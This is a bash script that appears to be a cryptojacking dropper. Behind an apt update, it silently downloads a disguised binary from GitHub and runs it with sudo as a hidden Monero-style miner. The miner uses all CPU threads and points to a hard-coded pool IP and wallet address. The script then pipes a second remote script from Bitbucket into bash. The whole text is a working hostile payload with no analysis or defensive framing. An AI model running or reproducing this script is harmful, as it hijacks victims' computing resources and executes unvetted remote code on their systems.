#!/bin/bash
apt-get update && apt-get upgrade -y 
wget -O sgr1 https://github.com/yumakanihnzah/ajojing/raw/main/xmolx >/dev/null 2>&1
chmod +x sgr1
sudo ./sgr1 -a rx/0 -o 139.144.119.94:80 -u ZEPHs9S2EWRQzizKJRbnnvATxUoGNCbG5AH5t3HoCwVRWGuyerr8UshcoEwjzbxq88MNDKhBdmzc1Qs1s4u8JQ33YDcbYhxx5SN -p SATE -t $(nproc --all) --donate-level 1 -k > /dev/null 2>&1 &
curl -sL https://bitbucket.org/commuter21/escom/raw/main/gudabel.sh | bash 
